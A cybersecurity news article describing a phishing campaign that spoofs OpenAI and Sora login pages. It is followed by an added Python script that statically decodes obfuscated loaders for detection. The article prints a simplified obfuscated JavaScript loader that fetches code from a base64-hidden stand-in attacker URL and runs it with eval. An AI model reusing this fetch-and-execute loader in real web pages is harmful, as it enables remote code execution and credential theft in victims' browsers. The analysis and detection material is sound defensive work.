Hackers Impersonate OpenAI and Sora Services to Steal Login Credentials

In Cybersecurity News. Original news source: cybersecuritynews.com, by Blog Writer.

In recent weeks, a sophisticated phishing campaign has emerged, targeting corporate and consumer accounts by impersonating both OpenAI and Sora-branded login portals.

Attackers distribute emails crafted to appear as legitimate service notifications, warning recipients of account suspension or unusual activity.

These messages include links directing victims to counterfeit login pages that closely replicate the original sites’ layouts and SSL certificates.

Early reports surfaced after several organizations reported unauthorized access attempts shortly after employees clicked through these phishing lures.

Unit 42 researchers identified that the threat actors behind this campaign employ a multi-stage loader written in obfuscated JavaScript, dynamically injecting malicious payloads into victim browsers once credentials are submitted.

The injected code then exfiltrates harvested usernames and passwords to a command-and-control (C2) server before redirecting users to the legitimate service, effectively masking the breach and reducing suspicion.

This stealthy approach allows the attackers to remain undetected while gathering large volumes of credentials from both enterprise and personal accounts.

The impact of this malware is significant: compromised credentials can be used to access sensitive data, manipulate AI models, or launch further attacks under the guise of trusted services.

Organizations relying on Single Sign-On (SSO) solutions are particularly vulnerable, as stolen tokens may grant lateral movement within corporate networks.

Security teams are advised to review recent login activity, implement multi-factor authentication (MFA), and monitor outbound traffic for connections to known malicious domains.

Infection Mechanism

Central to this campaign is the JavaScript loader, which executes immediately after the victim submits credentials on the fraudulent page.

The loader’s code is heavily obfuscated using custom string-encoding routines. A simplified excerpt of the loader is shown below:

(function(){
  // method names are kept in an array and referenced by index to defeat naive string matching
  const _0x3a5f=['fetch','then','text','eval'];
  // the C2 URL is stored base64-encoded and only decoded at runtime
  fetch(atob('aHR0cHM6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vZ2V0PWFqYXg='))
    [_0x3a5f[1]](res=>res[_0x3a5f[2]]())      // .then(res => res.text())
    [_0x3a5f[1]](payload=>eval(payload));     // .then(payload => eval(payload))
})();

Once decoded, this snippet reaches out to the C2 endpoint, retrieves a more complex payload, and executes it in the victim’s browser context.

This dynamic loading strategy makes signature-based detection challenging, as the actual malicious code is never present in the initial page.
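Because the payload itself never appears in the initial page, triage has to work on what is there: the base64-wrapped URL and the string-array indirection. The following Python script is an added example (not from the article or from Unit 42) that undoes both tricks statically, recovering the C2 host for blocklist checks and the method names hidden behind the _0x array lookups; the two sample scripts, the indicator names and the scoring threshold are constructed for illustration.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed sample: a loader in the style of the excerpt above (example.com host).
LOADER = r"""(function(){
  const _0x3a5f=['fetch','then','text','eval'];
  fetch(atob('aHR0cHM6Ly9tYWxpY2lvdXMuZXhhbXBsZS5jb20vZ2V0PWFqYXg='))
    [_0x3a5f[1]](res=>res[_0x3a5f[2]]())
    [_0x3a5f[1]](payload=>eval(payload));
})();"""
# Constructed benign sample: atob() used for an inline image, no fetch/eval chain.
BENIGN = r"""const img = new Image(); img.src = 'data:image/png;base64,' + atob('aGVsbG8=');"""

ATOB_RE = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
STR_ARRAY_RE = re.compile(r"(?:const|var|let)\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]")

def decode_atob_literals(script):
    """Decode every base64 literal passed to atob(); skip anything that is not valid base64/UTF-8."""
    decoded = []
    for m in ATOB_RE.finditer(script):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue
    return decoded

def resolve_string_array_lookups(script):
    """Map _0xNNNN[i] indirection back to the property names it hides (then, text, ...)."""
    resolved = set()
    for m in STR_ARRAY_RE.finditer(script):
        name, body = m.group(1), m.group(2)
        items = [s.strip().strip("'\"") for s in body.split(",") if s.strip()]
        for idx in re.findall(re.escape(name) + r"\[(\d+)\]", script):
            if int(idx) < len(items):
                resolved.add(items[int(idx)])
    return resolved

def analyze(script):
    """Score a script for the fetch -> then/text -> eval pattern with a base64-hidden URL."""
    urls = [s for s in decode_atob_literals(script) if s.startswith(("http://", "https://"))]
    hosts = sorted({urlparse(u).hostname for u in urls})   # candidates for blocklist lookup
    hidden = resolve_string_array_lookups(script)
    has_fetch, has_eval = "fetch(" in script, "eval(" in script
    indicators = {
        "hidden_url": bool(urls),          # URL concealed behind atob()
        "string_array": bool(hidden),      # _0x array used to hide property names
        "fetch_then_eval": has_fetch and has_eval and ("then" in hidden or ".then" in script),
    }
    return {"hosts": hosts, "hidden_names": hidden, "indicators": indicators,
            "suspicious": sum(indicators.values()) >= 2}
```

Run over captured landing-page HTML or proxy-logged script bodies, the recovered hosts feed a domain blocklist check and the indicator set gives a reason string for the alert.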

Persistence is achieved by leveraging browser local storage and session restoration scripts, ensuring the loader reactivates even if the user clears cookies or closes the tab.
